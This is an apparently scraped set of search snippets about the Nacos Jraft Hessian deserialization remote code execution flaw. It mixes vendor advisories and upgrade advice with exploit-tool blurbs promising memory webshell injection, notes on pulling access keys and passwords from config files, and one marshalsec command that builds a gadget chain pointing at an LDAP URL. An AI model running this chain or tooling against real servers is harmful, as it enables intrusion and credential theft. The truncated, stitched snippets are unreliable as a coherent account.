一、概要 近日,华为云关注到Nacos发布更新版本,修复了一处反序列化远程代码执行漏洞。Nacos集群在处理基于Jraft的请求时,使用hessian进行反序列化,但没有对反序列化类进行限制,导致远程代码执行。目前漏洞利用细节已公开,风险高。 Nacos是一个开源的分布式服务发现、配置管理和服务管理平台。华为云提醒使用Nacos的用户尽快...
Nacos Jraft Hessian反序列化远程代码执行漏洞是一个比较严重的漏洞,可以导致攻击者远程执行恶意代码,从而危及系统安全。如果您的Nacos版本是2.1.1,建议立即升级到2.1.2版本或以上,以修复该漏洞。 在升级Nacos之前,您需要备份现有的数据和配置文件,并确保升级过程中不会影响系统正常运行。升级Nacos的方法可以参考官方文档...
Recently, Nacos has released an updated version to fix a deserialization remote code execution vulnerability. When processing Jraft-based requests, the Nacos cluster uses hessian for deserialization, but does not restrict the deserialization class, which may allow remote code execution. Currently, the v...
https://exp.ci/2023/06/14/Nacos-JRaft-Hessian-反序列化分析/ https://github.com/Y4er/ysoserial Releases3 NacosRce v0.5Latest Jul 6, 2023 + 2 releases Packages No packages published Languages Java100.0%
同理,若想检测检测Nacos_Jraft_Hessian反序列化漏洞,同理可以将NacosRce压缩后上传到目标服务器上同一目录下,不过不建议这样,NacosRce太大了。 Nacos后利用 Nacos配置文件 上述利用完成后,会在/results/ip_port/public目录下生成目标站点的配置文件,a1phaboy师傅特别将ak/sk,password关键字提取了出来: ...
利用方式一:通过 marshalsec 生成 SpringPartiallyComparableAdvisorHolder 利用链。需要出网。(JNDI LDAP 反序列化 + POJONode 触发 TemplatesImpl) java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringPartiallyComparableAdvisorHolder ldap://127.0.0.1:1389/Deserialization/Jackson/nu1r/Base64/{ba...
5月25日 Nacos 发布一条安全公告,声称其在2.2.3 和 1.4.6两个大版本修复了 7848 端口下一处 Hessian 反序列化漏洞;网上有许多分析,但没有一篇分析能够把问题阐述清楚且解决掉,于是写下这篇文章,仅做记录。 0x01 漏洞分析 既然是 Hessian 反序列化,第一步要做的是查找对应的反序列化触发点,在项目中搜索 ...
Nacos Jraft Hessian反序列化远程代码执行漏洞预警 在个直接可以升级吗?2.1.1版本。
1、不出网漏洞利用 2、可多次发起漏洞利用 3、同时注入冰蝎/哥斯拉/CMD内存马 4、内存马对nacos多版本进行了兼容 tips: 1、请用jdk1.8 2、适用于 Nacos 2.x <= 2.2.2 3、非集群的也能打哦 4、此内存马重启nacos依然存活 关于Windows 如用下面的方式执行,注入内存马时会生成临时文件 C:\Windows\Temp\na...